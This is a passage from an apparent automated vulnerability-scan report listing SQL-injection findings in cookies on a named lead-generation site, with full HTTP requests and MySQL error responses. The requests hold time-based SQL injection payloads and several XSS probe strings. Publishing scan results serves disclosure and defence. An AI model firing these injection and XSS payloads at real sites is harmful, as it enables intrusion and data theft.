OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D'; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:55:49 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=pt5bianndj8idbus0459as1r15; path=/
Content-Length: 6630
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.91. http://www.insideup.com/ppc/leadflow/caad00/project.php [OAVARS[NSFTW] cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The OAVARS[NSFTW] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[NSFTW] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D'; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:55:42 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=e352ijjvnb0do57epaov4ts9g1; path=/
Content-Length: 6630
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.92. http://www.insideup.com/ppc/leadflow/caad00/project.php [OAVARS[\'+NSFTW+\'] cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The OAVARS[\'+NSFTW+\'] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[\'+NSFTW+\'] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D'; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:55:44 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ro5116utor68cfd53c4ok4p8d3; path=/
Content-Length: 6630
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.93. http://www.insideup.com/ppc/leadflow/caad00/project.php [OAVARS[\'\"-->] cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D'; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:55:37 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=j953h7ggk7f51m5ajv6lbuds66; path=/
Content-Length: 6630
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.94. http://www.insideup.com/ppc/leadflow/caad00/project.php [OAVARS[\'] cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The OAVARS[\'] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[\'] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
